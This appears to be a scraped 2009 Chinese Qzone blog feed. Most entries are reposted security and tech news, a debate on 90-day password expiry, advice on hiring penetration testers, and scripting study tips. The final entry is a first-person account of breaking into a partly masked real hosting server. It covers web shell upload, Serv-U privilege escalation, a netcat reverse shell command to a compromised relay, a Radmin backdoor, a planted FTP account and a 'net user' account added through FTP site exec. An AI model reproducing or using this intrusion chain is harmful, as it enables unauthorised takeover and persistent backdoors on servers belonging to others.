http://553574175.qzone.qq.com Sun, 29 Nov 2009 10:34:40 GMT Qzone zh-cn Copyright (C), 2005-2008, Tencent Tech. Co., Ltd. Sat, 28 Nov 2009 22:20:28 GMT http://553574175.qzone.qq.com/blog/1259446828 　　上周五，BugTraq邮递列表首次公开了IE浏览器的漏洞。但原来的示范代码并不可靠，而且这些代码也没有被用来进行实际的攻击。
　　赛门铁克安全响应中心高级研究经理本·戈林鲍姆（Ben Greenbaum）周三在接受采访时表示：“昨晚Metasploit公布的漏洞代码将比最初公布的漏洞代码威胁更大。”
　　截止周三早晨，赛门铁克还没有发现利用此漏洞代码的网络攻击。但安全专家认为，这种类型的代码属于非常受欢迎的被称为自驾游击的黑客技术。受害者被诱骗访问恶意代码网站，然后他们就会通过浏览器漏洞感染病毒。犯罪分子还把这种类型的代码放到被劫持的网站中以传播他们的攻击。
　　这周一，微软公布了关于IE浏览器漏洞的安全公告。该漏洞涉及IE6和IE7，微软最新版的浏览器IE8并不受此漏洞的影响。受影响的IE用户可以通过升级浏览器或禁用JavaScript以避免遭受攻击。
　　为了提升利用此漏洞的效率，Metasploit研究小组还采用了两位知名安全研究人员的安全技术。戈林鲍姆表示：“最初的漏洞代码使用的是堆喷射（heap-spraying）技术。它就像是一支散弹枪，通过大面积的射击范围以提高命中率。”
　　最新的漏洞代码使用了由Alexander Sotirov和Marc Dowd开发的.net dlll内存技术。“这种漏洞代码比堆喷射技术更为先进。”戈林鲍姆称。 ]]> http://553574175.qzone.qq.com/blog/1259446828#comment 142606848 Sat, 28 Nov 2009 22:20:28 GMT http://553574175.qzone.qq.com/blog/1259446828 http://553574175.qzone.qq.com/blog/1257435387 我们当然会想方设法来保护密码的安全，比如增加密码长度、使用复杂的语法以及特殊字符等等，这确实有助于增强密码的安全性，这些方法往往要求你每90天更改一次密码，但奇怪的是看不到什么明显的好处。坏家伙们通常会用四种基本的方法得到你的密码：
　　(A)直接询问，所谓的“钓鱼”和“社会工程学”的攻击仍然在进行，并且一直有效
　　(B)试着用字库来匹配提示框，希望碰到好运气
　　(C)获取加密之后的密码或哈希码，反过来进行解密
　　(D)使用keylogger等恶意软件在你在电脑中输入时获取密码
　　这四种情况不会因为你每隔90天更改了一次密码就从你身边走开。如果坏人们无法在几天内攻破哈希码(C)，他很可能去寻找更容易的攻击目标。 攻击(B)也是速战速决型，坏人们通常只使用前几百个单词，如果无效的话马上就会转向其他更容易的猎物。如果(B)或(C)攻击成功，或者攻击者通过更简 单的(A)或(D)获知密码，那么他们平均只需要45天就足以把你的银行帐户弄得一干二净，或者把你的电子邮件地址变成发送垃圾邮件的据点。
　　在过去25年左右的时间里，密码过期的概念没有什么变化。信息安全技术人员、审计人员、PCI、ISO27002和COBIT等等的要求都保 持不变，但威胁已经改变了不少。通常，密码脆弱的用户只会用另一个脆弱的密码来替代。而强迫一个密码强度已经很高的用户更改密码最终反而会惹恼他而使用简 单的密码。
　　那么90天的密码更改周期到底有什么意义呢?有一个实际的好处。那就是如果有人有你的密码而他们想做的一切只是偷偷的阅读你的电子邮件，那么 你改变密码可以阻止他们永远这样做下去。定期更改密码并不能抵御那些想要窃取你的机密的恶意攻击者，但它确实能让你摆脱那些偷偷摸摸的潜入者或窥探者。没 错，这是好的。但是，这点好处是否值得去强迫用户去不嫌麻烦的每90天更改一次密码呢，我有些怀疑。
　　信息安全风险管理的主要工作应该是识别威胁和漏洞，然后选择对策。但是，如果选择的对策实际上并不太可能降低所识别的威胁的话，那么它在安全工作中也是于事无补的。
　　当然，各方提供的“最佳实践标准”和审计部门的专员们会迫使我们用它。
　　以下是评论：
　　我为一家财富500强企业引入了“每90天改变你的密码”的规则，我来做个解释。许多人在多个系统上使用相同的密码。我发现其中有一台系统允 许用户查看名称目录中隐藏在文本域中的哈希密码，这是产品本身的弱点，我们发现这个哈希算法很容易破解，于是立即改变了哈希算法并且做出了90天的规则， 这样能够确保密码哈希的持续清洁，并且鼓励员工在外部网站使用与企业内部不同的密码。
　　缓解攻击不会改变它的发生概率，但能改变攻击成功的可能性。你所做的假设中所有的密码窃贼都会在试上几次强力攻击后放弃，一般来说是这样，但 并不总是。你暗示我们(审计部门)看不到不断变化的威胁是不对的，每90天的周期仍然太长，考虑到今天的处理能力。你必须采取长度、复杂性、历史以及各种 各样的帐户锁定策略。
　　我一直认为密码更改间隔应该与当前的处理能力挂钩。随着计算能力提高，破解哈希生成彩虹表所花费的时间越来越短。想一想摩尔定律就明白了。我认为应该使用破解工具作为基准，算出一个现实的破解哈希密码所需要的时间，然后来确定到底需要多长时间来改变一次密码。
　　我不明白的是更改密码的要求变得越来越短。10年前，每年更改一次密码在许多系统上已经足够了。最近90天是标准。现在我相信很快会看到60天、30天。
　　用户有时会共享密码。这是很让人头疼的，而周期性更改密码的要求会有助于解决这个问题。我赞同强制更改密码，即使这有可能导致用户采取低强度 的密码，但要教给他们良好的密码生成方法，还要给他们提供工具。你可以每年自己破解密码哈希几次，这会迫使那些密码强度弱的用户转变态度。许多用户使用默 认密码，如果你有5000个用户，其中至少有100人使用相同的密码。破解密码总是很容易，但重要的是培训好重要的用户，或者给他们工具。 ]]> http://553574175.qzone.qq.com/blog/1257435387#comment 142606848 Thu, 05 Nov 2009 15:36:27 GMT http://553574175.qzone.qq.com/blog/1257435387 http://553574175.qzone.qq.com/blog/1257157131 距离微软新操作系统Windows7全球发布还有32天的时间，对于广大学生来说，选择Windows7应该有以下5点优势：
　　1.价格
　　本周五，微软Windows7将向学生提供30美元的特价。这个消息对于希望体验Windows7的学生来说无疑是极为有利的，因为这个价位几乎与苹果雪豹29美元扯平。
　　需要指出的是，微软官方的学生特惠活动并不包括中国，但是有专家指出，大家可以加入IEEE，ACM等国际性的大型学术组织，其中很多产品都会对学生免费推出包括Windows7。
　　2.游戏性
　　Windows7中添加支持最新的DirectX11技术，绝大多数3D大型游戏在Windows7中都可以流畅的运行。各种针对系统游戏性的测评也显示，Windows7的游戏画面要比XP、Vista都要好；此外，与雪豹相比，支持Windows而开发的游戏种类显然要多很多。
　　3.兼容性
　　毫无疑问，Windows7要比雪豹更具备兼容其他软件的能力。从软件本身来看，开发设计人员首先考虑的问题就是如何与Windows系统兼容。
　　4.安全性
　　最新的报道显示，苹果寄予厚望的“雪豹”操作系统安全性较Windows7低很多。国外黑客CharlieMiller在极短的时间内就攻破了号称安全的MacOS。同时Miller表示，苹果操作系统的攻击率之所以会比Windows低，那是取决于Windows系统极高的市占率，就攻击难度来看，Windows的代码要比Mac更难写。
　　5.主导性
　　Windows系统拥有超过90%的市占率，微软一直与学校保持良好的合作关系向许多学术机构提供支持服务。反观苹果纯粹的高端定位，为商业人士或软件开发人员设计，与学生的要求渐行渐远，而且Mac机的定价也超过一般学生的承受能力。 ]]> http://553574175.qzone.qq.com/blog/1257157131#comment 142606848 Mon, 02 Nov 2009 10:18:51 GMT http://553574175.qzone.qq.com/blog/1257157131 http://553574175.qzone.qq.com/blog/1256982645 答：渗透测试的目标不仅是要评估电脑系统或者网络的安全性，还要决定成功攻击的可行性和商业影响。这样的测试模仿企图利用你的企业系统中的潜在的漏洞的攻击者。发现的任何安全问题随后都要报告，一起报告的还有对他们可能产生的影响的评估。建议还要指出如果减轻这些问题。通常这些测试都是在系统或者应用使用之前进行的。然后测试会定期进行。
　　在选择渗透测试员之前，需要正确地确定你想要测试哪些系统。例如，测试Unix系统的专家可能不是测试Windows系统的专家。一旦决定了要测试的系统，就向其他公司的同事询问做过类似工作的人的资料。相比较渗透测试证书而言，我更喜欢这种方法，因为在这个领域还没有真正的行业标准。
　　我也不会总是关注著名的咨询人员。这些咨询人员通常都是通才，而渗透测试是专业工作。不管你会用谁，都要保证当签订合同时，来的人不是生手。

　　还应该了解渗透潜在的测试人员喜欢使用的方法。执行渗透测试的最好方法是进行一系列系统的可以重复的测试，可以对很多不同种类的漏洞进行测试，避免使用效率较低的分散的方式。但是还是要谨慎对待检查清单的方法，并且不能过度依赖自动化工具。这种类型的结果更像是漏洞扫描而不是全面的渗透测试。渗透测试并不是精密科学，所以测试人员要在探究关注的领域时非常灵活，并对最新的阻力进行追踪。这样，测试就可以关注你的环境中的攻击携带者。
　　如果决定了让谁进行测试，要确保他们有时间进行彻底的评估。紧迫的时间限制会迫使测试人员跳过某些涉及到的问题。有一点很重要，他们要不断把发现的结果、测试完成后的最终报告细节、关键的发现和建议通知你。记住这些报告是你付了钱所购买的，而且你需要找时间何测试人员进行讨论。如果你在选择测试人员的时候很着急，那么不仅会造成资金的浪费，而且你收到的报告会让企业造成误解，对安全做出错误判断。 ]]> http://553574175.qzone.qq.com/blog/1256982645#comment 142606848 Sat, 31 Oct 2009 09:50:45 GMT http://553574175.qzone.qq.com/blog/1256982645 http://553574175.qzone.qq.com/blog/1256881622 记者二十九日从中国科技大学获悉,该校微尺度科学国家实验室杜江峰教授领导的研究小组和香港中文大学刘仁保教授合作,通过电子自旋共振实验技术,在国际上首次通过固态体系实验实现最优动力学解耦,使得量子计算机的问世成为可能.据介绍,将量子力学和计算机科学结合并实现量子计算是人类的一大梦想.量子计算的本质就是利用量子的相干性,而在现实中由于环境不可避免地会对量子系统发 生耦合干扰,使量子相干性随时间衰减发生消相干,计算任务无法完成.因此为使量子计算成为现实,首要急需解决的问题就是克服消相干.
　　杜江峰教授介绍说,以分解五百位的自然整数为例,目前最快的计算机需要用几十亿年才能完成,而用量子计算机,同样的重复频度,一分钟就可以解决.但量子计算如同人类思考问题需要一定时间.其时间长短取决于量子的相干性,相干性保持时间越长,量子计算机就可以处理复杂程度更高、难度更大的信息.因此,提高量子相干性,对提高量子计算机的能力十分关键.
　　为保持量子相干性,物理学家提出很多种方法,其中,最优动力学解耦是最有效的方法之一.杜江峰教授介绍说,最优动力学解耦方法就是通过一串精心设计的微波脉冲直接作用于自旋电子,让自旋电子反复翻转,“感受”到的外力上下翻转,消去电子自旋与环境中核自旋之间的耦合,保护电子自旋的量子相干性.
　　经过多年努力,杜江峰研究小组已成功建立目前中国国内唯一可以同时操控电子和核自旋的实验平台.研究人员用最多七个微波脉冲把一种叫丙二酸的材料里的电子自旋的相干时间从不足二千万分之一秒延长到了近三万分之一秒,这个时间已能够满足一些量子计算任务的需要.研究显示,即使在常温下,这样的方案也是可以工作的,这为用固态材料研制出能在室温下使用的量子计算机奠定了基础.
　　研究人员认为,一旦实际固态体系的各种退相干机制被人们所完全了解,高精度的相干控制将更加容易,距离量子计算机的真正实现也不再遥远.
　　据悉,该成果发表于十月二十九日出版的国际权威杂志《自然》上.审稿人认为“该工作有效地保持了固态自旋比特的量子相干性,对固态自旋量子计算的真正实现具有极其重要的意义”. ]]> http://553574175.qzone.qq.com/blog/1256881622#comment 142606848 Fri, 30 Oct 2009 05:47:02 GMT http://553574175.qzone.qq.com/blog/1256881622 http://553574175.qzone.qq.com/blog/1255412304 　　这个安全漏洞是在9月7日公开的。但是，到目前为止利用这个安全漏洞攻击计算机的程序除了导致系统崩溃之外还不能做其它的事情。Harmony安全高级研究员Stephen Fewer开发的攻击代码能够让攻击者在计算机上运行费授权的软件，从理论上使这个安全漏洞成为了一个严重的问题。Fewer的代码本周一添加到了开源Metasploit入侵测试工具。
　　两周前，一个名为Immunity的小公司开发了自己的利用这个安全漏洞的攻击代码。但是，这个代码仅提供给这家公司的注册用户。相比之下，任何人都可以下载Metasploit入侵测试工具。这就意味着这个攻击代码现在已经广泛提供了。
　　Metasploit开发人员HD Moore说，这个利用安全漏洞的代码在Windows Vista SP1和SP2以及Windows 2008 SP1服务器等软件上是有效的。这个攻击代码还可以攻击Windows 2008 SP2。
　　但是，这个攻击代码也许还不完全可靠。Immunity高级研究员Kostya Kortchinsky说，他只能利用这个Metasploit攻击代码攻击在VMware虚拟机进程中运行的Windows Vista操作系统。当他在本地Windows操作系统上运行这个攻击代码的时候，这个攻击代码只能导致系统崩溃。
　　这个攻击代码不影响Windows XP、Windows Server 2003或者Windows 2000操作系统。Windows 7已经修复了这个安全漏洞。
　　微软在10月13日发布安全补丁时是否会修复这个安全漏洞还有待观察。 ]]> http://553574175.qzone.qq.com/blog/1255412304#comment 142606848 Tue, 13 Oct 2009 05:38:24 GMT http://553574175.qzone.qq.com/blog/1255412304 http://553574175.qzone.qq.com/blog/1254037301 　　2.不要看到别人的回复第一句话就说：给个代码吧！你应该想想为什么。当你自己想出来再参考别人的提示，你就知道自己和别人思路的差异。
　　3.看帮助,不要因为很难而自己是初学者所以就不看；帮助永远是最好的参考手册，虽然帮助的文字有时候很难看懂，总觉得不够直观。
　　4.不要被对象、属性、方法等词汇所迷惑；最根本的是先了解最基础知识。
　　5.不要放过任何一个看上去很简单的小问题--他们往往并不那么简单，或者可以引伸出很多知识点；不会举一反三你就永远学不会。
　　6.知道一点东西，并不能说明你会写脚本，脚本是需要经验积累的。
　　7.学脚本并不难，ASP、PHP等等也不过如此--难的是长期坚持实践和不遗余力的博览群书；
　　8.看再多的书是学不全脚本的，要多实践
　　9.把时髦的技术挂在嘴边，还不如把过时的技术记在心里；
　　10.学习脚本最好的方法之一就是多练习；
　　11.在任何时刻都不要认为自己手中的书已经足够了；
　　12.看得懂的书，请仔细看；看不懂的书，请硬着头皮看；
　　13.别指望看第一遍书就能记住和掌握什么——请看第二遍、第三遍；
　　14.请把书上的例子亲手到电脑上实践，即使配套光盘中有源文件；
　　15.把在书中看到的有意义的例子扩充；并将其切实的运用到自己的工作中；
　　16.不要漏掉书中任何一个练习——请全部做完并记录下思路；
　　17.当你用脚本到一半却发现自己用的方法很拙劣时，请不要马上停手；请尽快将余下的部分粗略的完成以保证这个代码的完整性，然后分析自己的错误并重新编写和工作。
　　18.别心急，写脚本确实不容易；水平是在不断的实践中完善和发展的；
　　19.每学到一个脚本难点的时候，尝试着对别人讲解这个知识点并让他理解----你能讲清楚才说明你真的理解了；
　　20.记录下在和别人交流时发现的自己忽视或不理解的知识点；
　　21.保存好你做过的所有的源文件----那是你最好的积累之一；
　　22.对于网络，还是希望大家能多利用一下，很多问题不是非要到论坛来问的，首先你要学会自己找答案，比如google、百度都是很好的搜索引擎，你只要输入关键字就能找到很多相关资料，别老是等待别人给你希望，看的出你平时一定也很懒！
　　23，到一个论坛，你学会去看以前的帖子，不要什么都不看就发帖子问，也许你的问题早就有人问过了，你再问，别人已经不想再复了，做为初学者，谁也不希望自己的帖子没人回的。
　　24，虽然不是打击初学者，但是这句话还是要说：论坛论坛，就是大家讨论的地方，如果你总期望有高手总无偿指点你，除非他是你亲戚！！讨论者，起码是水平相当的才有讨论的说法，如果水平真差距太远了，连基本操作都需要别人给解答，谁还跟你讨论呢。
　　浮躁的人容易问：我到底该学什么；----别问，学就对了；
　　浮躁的人容易问：JS有钱途吗；----建议你去抢银行；
　　浮躁的人容易说：我要中文版！我英文不行！----不行？学呀！
　　浮躁的人分两种：只观望而不学的人；只学而不坚持的人；
　　浮躁的人永远不是一个高手 ]]> http://553574175.qzone.qq.com/blog/1254037301#comment 142606848 Sun, 27 Sep 2009 07:41:41 GMT http://553574175.qzone.qq.com/blog/1254037301 http://553574175.qzone.qq.com/blog/1253932365 　　根据微软目前所释出的消息，可以看得出来Windows 8的发展重点，包括支持64位计算机，并且将许多创新功能放在分布式文件档案系统复制（DFSR）的研发，另外，Windows 8还有防堵黑客及病毒的功能。
　　即将上市的Windows 7仍同时支持32位及64位的计算机，但服务器版本的操作系统Windows Server 2008 R2只有64位版本，种种迹象显示，微软未来将押宝在64位的计算机。
　　去年8月微软通信部主管Christopher Flores就曾经表示，64位CPU架构的推动下，64位的Windows将成为操作系统主流，因此，未来Windows 8的操作系统可能只开发64版本的产品。
　　微软也证实，目前已经成立了12支研发团队，投入Windows 8的开发。而这12个团队中，有8-9个团队，主要投入管理功能的开发。从微软上半年的招募人才可以看得出来，Windows 8最大的重心放在管理功能及分布式档案系统复制（DFSR）的引擎开发。
　　另一方面，呼应微软近来积极投入的云端运算计划，预期Windows 8的服务器操作系统版本可望成为云端运算中心的操作系统，而目前微软云端运算的Windows Azure平台，可望整合到下一世代操作系统Windows 8的服务器版本中。
　　另外，微软Windows 8也将改进部份功能，包括休眠、恢复、系统程序设计接口等，进行调整，而新操作系统也将新增PatchGuard的补丁防护功能，将诉求系统安全的强化，可望阻止黑客和病毒对系统核心的攻击。
　　至于Windows 8何时会上市，依据微软的新品上市时程，最快也要等到3年之后，业界评估极可能是在2013年左右。
]]> http://553574175.qzone.qq.com/blog/1253932365#comment 142606848 Sat, 26 Sep 2009 02:32:45 GMT http://553574175.qzone.qq.com/blog/1253932365 http://553574175.qzone.qq.com/blog/1253651183 　　经过一段时间的调查，安全研究人员仍然声称这一漏洞会导致系统被远程控制，Miami Beach就在上周三使用Immunity演示了使用该漏洞进行攻击的操作，并且发表在了Early Updates Program上。上周末，微软确认，基于Immunity的演示是属实的。
　　微软安全回应中心Mark Wodrich和Jonathan Ness在官方博客上表示：“我们自己也分析了这些代码，它在32位Vista和Windows Server 2008系统上是有效的。这种攻击能完全控制目标系统，而且能有未知用户发起。”
　　微软目前还不能确定何时可以开发出补丁，在补丁发布之前微软提供了一个修复帮助，用户可以到微软技术支持网站运行上周末刚刚发布的“Fix it”自动修复工具，该工具可以自动关闭SMB 2设备，使任何攻击都无法奏效，当然，用户也无法再使用该协议链接到文件服务器和网络打印机。 ]]> http://553574175.qzone.qq.com/blog/1253651183#comment 142606848 Tue, 22 Sep 2009 20:26:23 GMT http://553574175.qzone.qq.com/blog/1253651183 http://553574175.qzone.qq.com/blog/1253619196 http://www.sun***.com ，常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell，不是DVBBS，而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp，用过动鲨的door.exe的人都知道，这个是上传asp木马内容的。于是，上传海洋2005a，成功获得webshell.
　　测试一下权限，在cmd里运行set，获得主机一些信息，系统盘是D盘，也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件，只有一些垃圾文件，晕死。没关系，再来检查一下，虚拟主机都有serv-u的，这台也不例外，是5.0.0.8的。呵呵，是有本地溢出的呀。
　　思路：上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell.大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题)，没关系，用rain改的一个无组件上传，一共有3个文件，up.htm， upload.asp和uploadclass.asp.upload.asp和uploadclass.asp上传到同一个文件夹，up.htm是本地用的，修改up.htm里的链接地址为：http://www.sun***.com/lemon/upload.asp就可以上传了。
　　传上了srv.exe和nc.exe在H：\long\sun***\lemon(网站目录)后，发现没有运行权限。没关系，根据经验，一般系统下D：\Documents and Settings\All Users\是应该有运行权限的。于是想把文件copy过去，但是发现我们的webshell没有对D盘写的权限，晕死。
　　可以浏览D：\program files\serv-u\ServUDaemon.ini，不能改，难道要破解serv-u的密码，晕，不想。
　　我突然想到为什么系统不放在C盘了，难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下，如果主机有win98的系统盘，那里99%是FAT32分区的。我们还遇到过装有Ghost的主机，为了方便在DOS下备份，它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区，则网站就没有什么安全性可言了。虽然C盘不是系统盘，但是我们有执行权限。呵呵，copy srv.exe和nc.exe到c：\，运行 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”，这里的202.*.*.*是我们的肉鸡，在这之前我们已经在肉鸡上运行了nc –l –p 888.
　 我们成功获得一个系统shell连上肉鸡。(看起来简单，其实这里我们也遇到过挫折，我们发现有些版本的nc居然没有-e这个参数，还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功，会出现乱码，没办法用。为此，上传n次，错误n次,后来终于成功了。
　　高兴之余，我们仍不满足，因为这个shell实在是太慢了。于是，想用我们最常用的Radmin，其实管理员一按Alt+Ctrl+Del，看进程就能发现r_server了，但是还是喜欢用它，是因为不会被查杀。好了，上传admdll.dll，raddrv.dll，r_server.exe到H：\long\sun***\lemon，再用刚才nc得到的shell把它们copy到d：\winnt\system32\下，分别运行：r_server /install ， net start r_server ， r_server /pass：rain /save .
　　一阵漫长的等待，终于显示成功了。兴冲冲用radmin连上去，发现连接失败。晕死，忘了有防火墙了。上传pslist和pskill上去，发现有backice，木马克星等。Kill掉他们虽然可以登陆，但服务器重启后还是不行，终不是长久之计呀。防火墙是不防21，80等端口的，于是，我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来，覆盖本机的ServUDaemon.ini，在本机的serv-u上添加一个用户名为xr，密码为rain的系统帐号，加上所有权限。再用老办法，上传，用shell写入D：\program files\serv-u\里，覆盖掉原来的ServUDaemon.ini.虽然又等了n长时间，但是成功了，于是用flashfxp连上，发生530错误。郁闷，怎么又失败了。(根据经验这样应该就可以了，但为什么不行没有想通，请高手指点。)
　　不管了，我们重启serv-u就ok了，怎么重启呢，开始想用shutdown重启系统，但那样我们就失去了nc这个shell，还可能被发现。后来，眼睛一亮，我们不是有pskill吗?刚才用pslist发现有这个进程：ServUDaemon .把它kill了。然后再运行D：\program files\serv-u\ ServUAdmin.exe ，这里要注意不是ServUDaemon.exe .
　　好了，到这里，我们直接ftp上去吧，ls一下，哈哈，系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的，这样就可以：
　　ftp>quote site exec net user xr rain /add
　　在webshell上运行net user，就可以看见添加成功了。
　　整个入侵渗透到这就结束了，在一阵后清理打扫后。我们就开始讨论了。其实，突破防火墙有很多好的rootkit可以做到的，但是我们觉得系统自带的服务才是最安全的后门。 ]]> http://553574175.qzone.qq.com/blog/1253619196#comment 142606848 Tue, 22 Sep 2009 11:33:16 GMT http://553574175.qzone.qq.com/blog/1253619196